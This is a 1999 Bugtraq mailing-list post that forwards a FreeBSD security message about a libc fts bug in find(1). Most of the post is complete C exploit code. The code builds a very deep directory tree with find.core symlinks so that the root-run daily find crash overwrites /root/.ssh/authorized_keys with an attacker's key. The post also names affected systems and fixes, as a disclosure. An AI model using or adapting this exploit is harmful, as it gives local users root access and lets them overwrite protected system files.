Bugtraq mailing list archives
Re: RE: fts_print() , find and other stuff ?
From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Wed, 25 Aug 1999 09:13:18 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -----FW: <XFMail.990825091318.venglin () FreeBSD lublin pl>----- Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST) Sender: owner-freebsd-security () FreeBSD ORG From: Przemyslaw Frasunek <venglin () FreeBSD lublin pl> To: Rafal Banaszkiewicz <raf () tb-303 org> Subject: RE: fts_print() , find and other stuff ? Cc: freebsd-security () freebsd org On 24-Aug-99 Rafal Banaszkiewicz wrote:
One of my friends has written sploit code for this bug ? It's old bug ... and it's still not fixed .
Yes, this bug is quite easy to exploit. Find(1) runs every day from /etc/security script. It segfaults, when directory tree is _very_ long, because of junk pointer to directory name. Core is created in one of directories from our tree. But if find.core already exists, it's overwritten. It's possible to create symlink from eg. master.passwd or something else to find.core, and this file will be overwritten. Sample code below. BTW. Sorry for my poor English. /* (c) 1999 babcia padlina ltd. <babunia () FreeBSD lublin pl> bug in fts libc functions allows to overwrite any file in system, when running /etc/security script (executed from 'daily' scripts). affected systems: - freebsd (all versions) - probably openbsd/netbsd fix: - limit root's coredump size - patch libc */ #include <stdio.h> #include <errno.h> #include <sys/stat.h> #include <strings.h> #include <unistd.h> #define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" #define FILE "/root/.ssh/authorized_keys" #define CORE "find.core" #define DEPTH 300 #define BUFSIZE 250 int makedir(dir, linkfrom, linkto) char *dir, *linkfrom, *linkto; { if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) return -1; if (chdir(dir)) return -1; if (symlink(linkfrom, linkto) < 0) return -1; return 0; } int main(void) { int i = 0; char pid[10], buf[BUFSIZE]; sprintf(pid, "%d", getpid()); if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) { perror("mkdir()"); return -1; } if (chdir(pid)) { perror("chdir()"); return -1; } bzero(buf, BUFSIZE); memset(buf, 0x41, BUFSIZE-1); for(i=0;i<DEPTH;i++) { if (makedir(STRING, FILE, CORE) < 0) { perror("makedir()"); return -1; } if(makedir(buf, FILE, CORE) < 0) { perror("makedir()"); return -1; } } return 0; } - --------------End of forwarded message------------------------- - --- * Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 * * Inet: venglin () FreeBSD lublin pl ** PGP: D48684904685DF43 EA93AFA13BE170BF * -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQA/AwUBN8OcA/6SPyHAYTvjEQLrywCfd5hMX9Cak+W1SuW7o4oA4o/RUPoAoJDC 8PVlnVtNw9p7rTmtBtTL3uC4 =P88V -----END PGP SIGNATURE-----
Current thread:
- Re: RE: fts_print() , find and other stuff ? Przemyslaw Frasunek (Aug 25)